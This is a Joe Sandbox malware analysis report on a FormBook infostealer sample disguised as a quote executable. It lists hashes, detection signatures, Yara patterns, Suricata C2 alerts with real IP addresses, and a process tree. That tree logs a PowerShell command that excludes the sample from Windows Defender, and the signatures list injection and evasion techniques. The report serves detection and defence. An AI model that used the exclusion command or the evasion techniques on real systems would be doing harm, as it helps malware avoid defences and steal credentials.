Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTE2342534.exe

Overview

General Information

Sample name:QUOTE2342534.exe
Analysis ID:1541203
MD5:c19949939d08baee86643132d7ce7542
SHA1:5c8f131cb332bb49c68ab04cc2350c224d4d4d5b
SHA256:a99f8a264c968ef7d4815a0bf6d53854d7c26da69adba84750c48c58bfea7384
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • QUOTE2342534.exe (PID: 1992 cmdline: "C:\Users\user\Desktop\QUOTE2342534.exe" MD5: C19949939D08BAEE86643132D7CE7542)
    • powershell.exe (PID: 5396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 5908 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • QUOTE2342534.exe (PID: 2704 cmdline: "C:\Users\user\Desktop\QUOTE2342534.exe" MD5: C19949939D08BAEE86643132D7CE7542)
      • qnPyaKsYTE.exe (PID: 1308 cmdline: "C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mshta.exe (PID: 5652 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)
          • qnPyaKsYTE.exe (PID: 2296 cmdline: "C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 2672 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2be40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f213:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        4.2.QUOTE2342534.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          4.2.QUOTE2342534.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e413:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x165c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          4.2.QUOTE2342534.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            4.2.QUOTE2342534.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f213:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x173c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTE2342534.exe", ParentImage: C:\Users\user\Desktop\QUOTE2342534.exe, ParentProcessId: 1992, ParentProcessName: QUOTE2342534.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", ProcessId: 5396, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTE2342534.exe", ParentImage: C:\Users\user\Desktop\QUOTE2342534.exe, ParentProcessId: 1992, ParentProcessName: QUOTE2342534.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", ProcessId: 5396, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTE2342534.exe", ParentImage: C:\Users\user\Desktop\QUOTE2342534.exe, ParentProcessId: 1992, ParentProcessName: QUOTE2342534.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\QUOTE2342534.exe", ProcessId: 5396, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-24T15:17:34.755819+020020507451Malware Command and Control Activity Detected192.168.2.549787129.226.56.20080TCP
            2024-10-24T15:17:58.289735+020020507451Malware Command and Control Activity Detected192.168.2.549908162.0.215.3380TCP
            2024-10-24T15:18:11.858271+020020507451Malware Command and Control Activity Detected192.168.2.549988154.7.176.6780TCP
            2024-10-24T15:18:25.764032+020020507451Malware Command and Control Activity Detected192.168.2.549994118.139.178.3780TCP
            2024-10-24T15:18:39.754324+020020507451Malware Command and Control Activity Detected192.168.2.5499983.33.130.19080TCP
            2024-10-24T15:18:53.193242+020020507451Malware Command and Control Activity Detected192.168.2.550002209.74.64.19080TCP
            2024-10-24T15:19:15.027966+020020507451Malware Command and Control Activity Detected192.168.2.55000684.32.84.3280TCP
            2024-10-24T15:19:28.733341+020020507451Malware Command and Control Activity Detected192.168.2.55001084.32.84.3280TCP
            2024-10-24T15:19:43.191467+020020507451Malware Command and Control Activity Detected192.168.2.5500143.33.130.19080TCP
            2024-10-24T15:19:58.261258+020020507451Malware Command and Control Activity Detected192.168.2.550018154.9.228.5680TCP
            2024-10-24T15:20:11.898123+020020507451Malware Command and Control Activity Detected192.168.2.55002284.32.84.3280TCP
            2024-10-24T15:20:25.338793+020020507451Malware Command and Control Activity Detected192.168.2.5500263.33.130.19080TCP
            2024-10-24T15:20:39.303019+020020507451Malware Command and Control Activity Detected192.168.2.550030129.226.176.9080TCP
            2024-10-24T15:20:53.021801+020020507451Malware Command and Control Activity Detected192.168.2.550034213.249.67.1080TCP
            2024-10-24T15:21:06.507896+020020507451Malware Command and Control Activity Detected192.168.2.55003867.223.117.16980TCP
            2024-10-24T15:21:15.678139+020020507451Malware Command and Control Activity Detected192.168.2.550039129.226.56.20080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-24T15:17:34.755819+020028554651A Network Trojan was detected192.168.2.549787129.226.56.20080TCP
            2024-10-24T15:17:58.289735+020028554651A Network Trojan was detected192.168.2.549908162.0.215.3380TCP
            2024-10-24T15:18:11.858271+020028554651A Network Trojan was detected192.168.2.549988154.7.176.6780TCP
            2024-10-24T15:18:25.764032+020028554651A Network Trojan was detected192.168.2.549994118.139.178.3780TCP
            2024-10-24T15:18:39.754324+020028554651A Network Trojan was detected192.168.2.5499983.33.130.19080TCP
            2024-10-24T15:18:53.193242+020028554651A Network Trojan was detected192.168.2.550002209.74.64.19080TCP
            2024-10-24T15:19:15.027966+020028554651A Network Trojan was detected192.168.2.55000684.32.84.3280TCP
            2024-10-24T15:19:28.733341+020028554651A Network Trojan was detected192.168.2.55001084.32.84.3280TCP
            2024-10-24T15:19:43.191467+020028554651A Network Trojan was detected192.168.2.5500143.33.130.19080TCP
            2024-10-24T15:19:58.261258+020028554651A Network Trojan was detected192.168.2.550018154.9.228.5680TCP
            2024-10-24T15:20:11.898123+020028554651A Network Trojan was detected192.168.2.55002284.32.84.3280TCP
            2024-10-24T15:20:25.338793+020028554651A Network Trojan was detected192.168.2.5500263.33.130.19080TCP
            2024-10-24T15:20:39.303019+020028554651A Network Trojan was detected192.168.2.550030129.226.176.9080TCP
            2024-10-24T15:20:53.021801+020028554651A Network Trojan was detected192.168.2.550034213.249.67.1080TCP
            2024-10-24T15:21:06.507896+020028554651A Network Trojan was detected192.168.2.55003867.223.117.16980TCP
            2024-10-24T15:21:15.678139+020028554651A Network Trojan was detected192.168.2.550039129.226.56.20080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-24T15:17:50.661493+020028554641A Network Trojan was detected192.168.2.549866162.0.215.3380TCP
            2024-10-24T15:17:53.204856+020028554641A Network Trojan was detected192.168.2.549877162.0.215.3380TCP
            2024-10-24T15:17:55.800063+020028554641A Network Trojan was detected192.168.2.549893162.0.215.3380TCP
            2024-10-24T15:18:04.066733+020028554641A Network Trojan was detected192.168.2.549940154.7.176.6780TCP
            2024-10-24T15:18:06.701912+020028554641A Network Trojan was detected192.168.2.549956154.7.176.6780TCP
            2024-10-24T15:18:09.300403+020028554641A Network Trojan was detected192.168.2.549972154.7.176.6780TCP
            2024-10-24T15:18:18.102772+020028554641A Network Trojan was detected192.168.2.549991118.139.178.3780TCP
            2024-10-24T15:18:20.660384+020028554641A Network Trojan was detected192.168.2.549992118.139.178.3780TCP
            2024-10-24T15:18:23.198270+020028554641A Network Trojan was detected192.168.2.549993118.139.178.3780TCP
            2024-10-24T15:18:32.121083+020028554641A Network Trojan was detected192.168.2.5499953.33.130.19080TCP
            2024-10-24T15:18:34.660847+020028554641A Network Trojan was detected192.168.2.5499963.33.130.19080TCP
            2024-10-24T15:18:37.198128+020028554641A Network Trojan was detected192.168.2.5499973.33.130.19080TCP
            2024-10-24T15:18:45.534874+020028554641A Network Trojan was detected192.168.2.549999209.74.64.19080TCP
            2024-10-24T15:18:48.076990+020028554641A Network Trojan was detected192.168.2.550000209.74.64.19080TCP
            2024-10-24T15:18:50.618876+020028554641A Network Trojan was detected192.168.2.550001209.74.64.19080TCP
            2024-10-24T15:19:07.397027+020028554641A Network Trojan was detected192.168.2.55000384.32.84.3280TCP
            2024-10-24T15:19:09.927429+020028554641A Network Trojan was detected192.168.2.55000484.32.84.3280TCP
            2024-10-24T15:19:12.472446+020028554641A Network Trojan was detected192.168.2.55000584.32.84.3280TCP
            2024-10-24T15:19:21.037599+020028554641A Network Trojan was detected192.168.2.55000784.32.84.3280TCP
            2024-10-24T15:19:23.579947+020028554641A Network Trojan was detected192.168.2.55000884.32.84.3280TCP
            2024-10-24T15:19:26.144998+020028554641A Network Trojan was detected192.168.2.55000984.32.84.3280TCP
            2024-10-24T15:19:34.648166+020028554641A Network Trojan was detected192.168.2.5500113.33.130.19080TCP
            2024-10-24T15:19:37.197064+020028554641A Network Trojan was detected192.168.2.5500123.33.130.19080TCP
            2024-10-24T15:19:40.664933+020028554641A Network Trojan was detected192.168.2.5500133.33.130.19080TCP
            2024-10-24T15:19:50.506125+020028554641A Network Trojan was detected192.168.2.550015154.9.228.5680TCP
            2024-10-24T15:19:53.162610+020028554641A Network Trojan was detected192.168.2.550016154.9.228.5680TCP
            2024-10-24T15:19:55.190262+020028554641A Network Trojan was detected192.168.2.550017154.9.228.5680TCP
            2024-10-24T15:20:04.161070+020028554641A Network Trojan was detected192.168.2.55001984.32.84.3280TCP
            2024-10-24T15:20:06.704003+020028554641A Network Trojan was detected192.168.2.55002084.32.84.3280TCP
            2024-10-24T15:20:09.260559+020028554641A Network Trojan was detected192.168.2.55002184.32.84.3280TCP
            2024-10-24T15:20:17.685267+020028554641A Network Trojan was detected192.168.2.5500233.33.130.19080TCP
            2024-10-24T15:20:20.245208+020028554641A Network Trojan was detected192.168.2.5500243.33.130.19080TCP
            2024-10-24T15:20:22.794697+020028554641A Network Trojan was detected192.168.2.5500253.33.130.19080TCP
            2024-10-24T15:20:31.649129+020028554641A Network Trojan was detected192.168.2.550027129.226.176.9080TCP
            2024-10-24T15:20:34.211362+020028554641A Network Trojan was detected192.168.2.550028129.226.176.9080TCP
            2024-10-24T15:20:36.756154+020028554641A Network Trojan was detected192.168.2.550029129.226.176.9080TCP
            2024-10-24T15:20:45.365532+020028554641A Network Trojan was detected192.168.2.550031213.249.67.1080TCP
            2024-10-24T15:20:47.912709+020028554641A Network Trojan was detected192.168.2.550032213.249.67.1080TCP
            2024-10-24T15:20:50.459325+020028554641A Network Trojan was detected192.168.2.550033213.249.67.1080TCP
            2024-10-24T15:20:58.859899+020028554641A Network Trojan was detected192.168.2.55003567.223.117.16980TCP
            2024-10-24T15:21:01.398710+020028554641A Network Trojan was detected192.168.2.55003667.223.117.16980TCP
            2024-10-24T15:21:04.347829+020028554641A Network Trojan was detected192.168.2.55003767.223.117.16980TCP
            2024-10-24T15:21:21.986343+020028554641A Network Trojan was detected192.168.2.550040162.0.215.3380TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: QUOTE2342534.exeReversingLabs: Detection: 28%
            Yara detected FormBook
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.QUOTE2342534.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.4594417209.0000000003680000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2231861338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4594132519.0000000003340000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4597123623.0000000004CB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2232369881.0000000001620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2233350481.0000000002F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4594398823.0000000003FD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: QUOTE2342534.exeJoe Sandbox ML: detected
            Source: QUOTE2342534.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: QUOTE2342534.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshta.pdbGCTL source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qnPyaKsYTE.exe, 00000007.00000000.2154339993.000000000012E000.00000002.00000001.01000000.0000000C.sdmp, qnPyaKsYTE.exe, 0000000A.00000000.2297414318.000000000012E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdbSHA256 source: QUOTE2342534.exe
            Source: Binary string: wntdll.pdb source: QUOTE2342534.exe, QUOTE2342534.exe, 00000004.00000002.2232503719.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2232129759.00000000034B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.2233823345.000000000366A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: iFFZ.pdb source: QUOTE2342534.exe
            Source: Binary string: mshta.pdb source: QUOTE2342534.exe, 00000004.00000002.2232065125.0000000001197000.00000004.00000020.00020000.00000000.sdmp, qnPyaKsYTE.exe, 00000007.00000002.4593662972.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 8_2_02F3C390 FindFirstFileW,FindNextFileW,FindClose,8_2_02F3C390
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then xor eax, eax8_2_02F29B10
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then pop edi8_2_02F2E030
            Source: C:\Windows\SysWOW64\mshta.exeCode function: 4x nop then mov ebx, 00000004h8_2_03B604DF

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49787 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49787 -> 129.226.56.200:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49866 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49877 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49893 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49908 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49908 -> 162.0.215.33:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49940 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49956 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49972 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49994 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49994 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49988 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 154.7.176.67:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 118.139.178.37:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50010 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50010 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50014 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50030 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50030 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 84.32.84.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 209.74.64.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 154.9.228.56:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 129.226.176.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50031 -> 213.249.67.10:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50037 -> 67.223.117.169:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50035 -> 67.223.117.169:80
